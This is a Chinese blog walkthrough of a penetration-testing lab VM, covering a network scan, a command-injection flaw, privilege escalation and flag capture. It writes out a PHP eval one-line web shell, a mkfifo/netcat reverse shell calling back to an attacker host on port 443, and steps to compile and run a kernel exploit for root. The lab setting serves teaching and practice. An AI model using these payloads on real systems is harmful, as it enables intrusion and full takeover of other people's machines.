一、启动环境(下载地址)

还有kali

二、开始操作

nmap扫描

nmap 192.168.31.0/24 扫描全网段

开放了80端口,访问一下

是一个未授权访问,点site进去看看

随便点点找找有没有啥有用的

发现这里似乎可以写参数

发现命令执行漏洞,果断上传一个一句话马,payload:

echo '<?php @eval($_POST['shell']);?>' >> getshell.php

蚁剑连接

逛一逛在home下发现第一个flag

反弹shell

反弹shell(经测试和查攻略,似乎只能监听443端口)

在蚁剑上创建一个文件shell.php,写入<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.183.211 443 >/tmp/f');?> 后保存,然后网页直接访问shell.php,查看kali:

转换为交互式shellpython3 -c 'import pty;pty.spawn("/bin/bash")'

提权

uname -a查看内核版本

寻找一下内核版本漏洞searchsploit ubuntu 4.4.0

用红框那个.c文件,把内容写到靶机上,然后提权

gcc 45010.c -o exp #生成可执行文件

chmod +x exp #添加可执行权限

./exp #执行exp文件

执行完之后就提权成功了,id查看一下确实已经是root用户了,去root下找找flag

成功!

总结

非常简单的一个靶场

文章作者: 永恒的二师兄
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 永恒的二师兄
信息安全 靶场 kali
喜欢就支持一下吧